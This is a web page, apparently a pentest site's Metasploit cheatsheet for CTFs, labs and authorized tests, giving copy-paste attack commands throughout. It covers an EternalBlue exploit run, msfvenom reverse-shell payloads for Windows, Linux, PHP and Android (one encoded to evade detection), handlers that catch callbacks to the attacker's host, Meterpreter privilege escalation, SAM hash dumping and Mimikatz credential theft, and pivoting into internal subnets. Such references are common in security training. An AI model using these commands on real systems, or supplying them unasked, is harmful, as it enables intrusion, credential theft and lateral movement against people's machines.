Metasploit Cheatsheet 2026

Every command you need for the Metasploit Framework — msfconsole workflow, msfvenom payloads, Meterpreter, session management, handlers and pivoting. Copy-paste ready for CTFs, labs and authorized pentests.

Last updated:

New to pentesting? Read our complete beginner's guide to see where Metasploit fits in the methodology.

Quick Navigation

01 Start & Database 02 Search Modules 03 Exploit Workflow 04 Payloads 05 multi/handler 06 msfvenom 07 Meterpreter 08 Sessions 09 Post-Exploitation 10 Pivoting

# Start & Database Setup

Initialise the PostgreSQL database first — it stores hosts, services and loot, and makes searching much faster.

sudo msfdb init
Initialise the Metasploit PostgreSQL database (once)
msfconsole -q
Launch the console quietly (no banner)
db_status
Check the database connection
db_nmap -sV -sC 10.10.10.5
Run nmap from inside msf and store results in the DB
hosts; services
List discovered hosts and services from the DB
workspace -a client_x
Create an isolated workspace per engagement

# The Exploit Workflow

The core loop: use → set options → check → exploit. Same pattern for every module.

use exploit/windows/smb/ms17_010_eternalblue
Select an exploit module
show options
List required and optional settings
set RHOSTS 10.10.10.5
Set the target host(s)
set LHOST tun0
Set your listener IP — use the interface name to auto-resolve
set LPORT 443
Set the listener port
check
Test if the target is vulnerable without exploiting (when supported)
exploit -j
Run the exploit as a background job

# Payloads

Pick a payload that matches the target and your network. Staged (/) needs a stager; stageless (_) is a single self-contained blob.

show payloads
List payloads compatible with the selected exploit
set payload windows/x64/meterpreter/reverse_tcp
Staged Meterpreter over reverse TCP
set payload windows/x64/meterpreter_reverse_https
Stageless Meterpreter over HTTPS — better through proxies/firewalls
set payload linux/x64/shell_reverse_tcp
Plain reverse shell (when Meterpreter isn't available)
💡 Tip: Staged (windows/.../reverse_tcp) sends a small stager first; stageless (meterpreter_reverse_tcp) is one blob — more reliable over flaky links.

# multi/handler — Catch Any Shell

Use the handler to receive a connection from a payload you generated with msfvenom or dropped manually.

use exploit/multi/handler
Select the generic payload handler
set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run
Configure to match your payload and start listening
msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 443; run"
One-liner to launch a handler directly from the shell
set ExitOnSession false
Keep the handler alive to catch multiple shells

# msfvenom — Generate Payloads

Build standalone payload files in any format. Catch them with a matching multi/handler.

msfvenom -l payloads
List all available payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -o shell.exe
Windows Meterpreter executable
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=443 -f elf -o shell.elf
Linux reverse shell ELF
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f raw -o shell.php
PHP Meterpreter for web upload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f exe -e x64/xor_dynamic -i 5 -o enc.exe
Encoded to evade basic signature detection
msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=443 -o app.apk
Android Meterpreter APK

# Meterpreter Commands

Once you have a Meterpreter session, these are the everyday commands.

sysinfo; getuid
OS info and current user
getsystem
Attempt automatic privilege escalation to SYSTEM
getprivs
List the privileges of the current token
hashdump
Dump local SAM password hashes (needs SYSTEM)
upload /tmp/winPEAS.exe C:\\Windows\\Temp\\
Upload a file to the target
download C:\\Users\\admin\\Desktop\\proof.txt
Download a file from the target
shell
Drop into a native OS shell (exit to return to Meterpreter)
migrate -N explorer.exe
Migrate into a stable process by name
load kiwi; creds_all
Load the Mimikatz (kiwi) extension and dump credentials

# Session Management

Juggle multiple shells and upgrade basic shells to Meterpreter.

sessions -l
List all active sessions
sessions -i 1
Interact with session 1
Ctrl+Z
Background the current session (keeps it alive)
sessions -u 2
Upgrade a basic shell (session 2) to Meterpreter
sessions -c "whoami" -i 1
Run a command on a session without interacting
sessions -K
Kill all sessions

# Post-Exploitation Modules

Run post modules against an existing session for enumeration and persistence.

run post/multi/recon/local_exploit_suggester
Suggest local privilege escalation exploits for the session
run post/windows/gather/enum_logged_on_users
Enumerate logged-on users
run post/windows/manage/migrate
Auto-migrate to a safer process
run post/multi/manage/shell_to_meterpreter
Upgrade a shell session to Meterpreter

# Pivoting

Use a compromised host as a gateway into internal subnets you can't reach directly.

run autoroute -s 10.10.20.0/24
Add a route to an internal subnet through the session
use post/multi/manage/autoroute; set SESSION 1; run
Same via the post module
use auxiliary/server/socks_proxy; set SRVPORT 1080; run -j
Start a SOCKS proxy for tools outside Metasploit
proxychains nmap -sT -Pn 10.10.20.10
Route external tools through the pivot with proxychains
portfwd add -l 3389 -p 3389 -r 10.10.20.10
Forward a target port to your local machine

❓ Metasploit FAQ

The most widely used pentest framework — thousands of exploits, payloads, auxiliary and post modules behind one console (msfconsole). You search a module, set its options (RHOSTS, LHOST) and run it.

msfconsole is the interactive console for running modules. msfvenom generates standalone payload files (exe, elf, php, apk). You often build with msfvenom and catch with a multi/handler.

Metasploit's advanced in-memory payload. It gives file transfer, getsystem, hashdump, screen capture, keylogging and pivoting — all without writing to disk, so it's stealthier than a plain shell.

use exploit/multi/handler, set payload to match your msfvenom payload, set LHOST/LPORT, then run. It catches the incoming connection and opens a session.

sessions -l lists, sessions -i ID interacts, Ctrl+Z backgrounds. Run without interacting via sessions -c 'whoami' -i ID, upgrade a shell with sessions -u ID.

From Meterpreter, run autoroute -s 10.10.20.0/24, then use auxiliary scanners internally, or start auxiliary/server/socks_proxy and point proxychains at it.

You may use Metasploit/Meterpreter on only one target of your choice; it's restricted elsewhere, so master manual exploitation. msfvenom for payloads is generally allowed — always check the current rules.

On Kali: sudo apt update && sudo apt install metasploit-framework. From the Rapid7 installer, use msfupdate. Then run msfconsole and reload_all to rebuild the module cache.

📚 Related Resources

AI-Assisted Pentest Report

Turn your Metasploit sessions into a professional PDF report. AI auto-fills CVE, CVSS and severity.

Try for free →

Want all 12,020+ commands?

This Metasploit cheatsheet is one branch of the map. Pentest Mindmap organizes 12,020+ commands across 34 categories — recon to post-exploitation — with instant search and one-click copy.

Start free →